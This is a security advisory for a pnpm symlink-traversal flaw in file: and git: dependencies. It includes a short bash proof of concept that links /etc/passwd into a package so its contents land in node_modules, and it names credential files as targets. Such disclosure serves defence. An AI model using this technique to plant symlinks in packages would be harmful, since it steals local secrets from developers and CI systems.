CVE-2026-24056
pnpm has symlink traversal in file:/git dependencies
Description
### Summary When pnpm installs a `file:` (directory) or `git:` dependency, it follows symlinks and reads their target contents without constraining them to the package root. A malicious package containing a symlink to an absolute path (e.g., `/etc/passwd`, `~/.ssh/id_rsa`) causes pnpm to copy that file's contents into `node_modules`, leaking local data. **Preconditions:** Only affects `file:` and `git:` dependencies. Registry packages (npm) have symlinks stripped during publish and are NOT affected. ### Details The vulnerability exists in `store/cafs/src/addFilesFromDir.ts`. The code uses `fs.statSync()` and `readFileSync()` which follow symlinks by default: ```typescript const absolutePath = path.join(dirname, relativePath) const stat = fs.statSync(absolutePath) // Follows symlinks! const buffer = fs.readFileSync(absolutePath) // Reads symlink TARGET ``` There is no check that `absolutePath` resolves to a location inside the package directory. ### PoC ```bash # Create malicious package mkdir -p /tmp/evil && cd /tmp/evil ln -s /etc/passwd leaked-passwd.txt echo '{"name":"evil","version":"1.0.0","files":["*.txt"]}' > package.json # Victim installs mkdir /tmp/victim && cd /tmp/victim pnpm init && pnpm add file:../evil # Leaked! cat node_modules/evil/leaked-passwd.txt ``` ### Impact - Developers installing local/file dependencies - CI/CD pipelines installing git dependencies - Credential theft via symlinks to `~/.aws/credentials`, `~/.npmrc`, `~/.ssh/id_rsa` ### Suggested Fix Use `lstatSync` to detect symlinks and reject those pointing outside the package root in `store/cafs/src/addFilesFromDir.ts`.
How to fix CVE-2026-24056
To remediate CVE-2026-24056, upgrade the affected package to a fixed version below.
- —upgrade to 10.28.2 or later
Is CVE-2026-24056 being exploited?
Low — EPSS is 0.0%, meaning exploitation activity has not been observed at scale.
Affected packages (1)
- from 0, < 10.28.2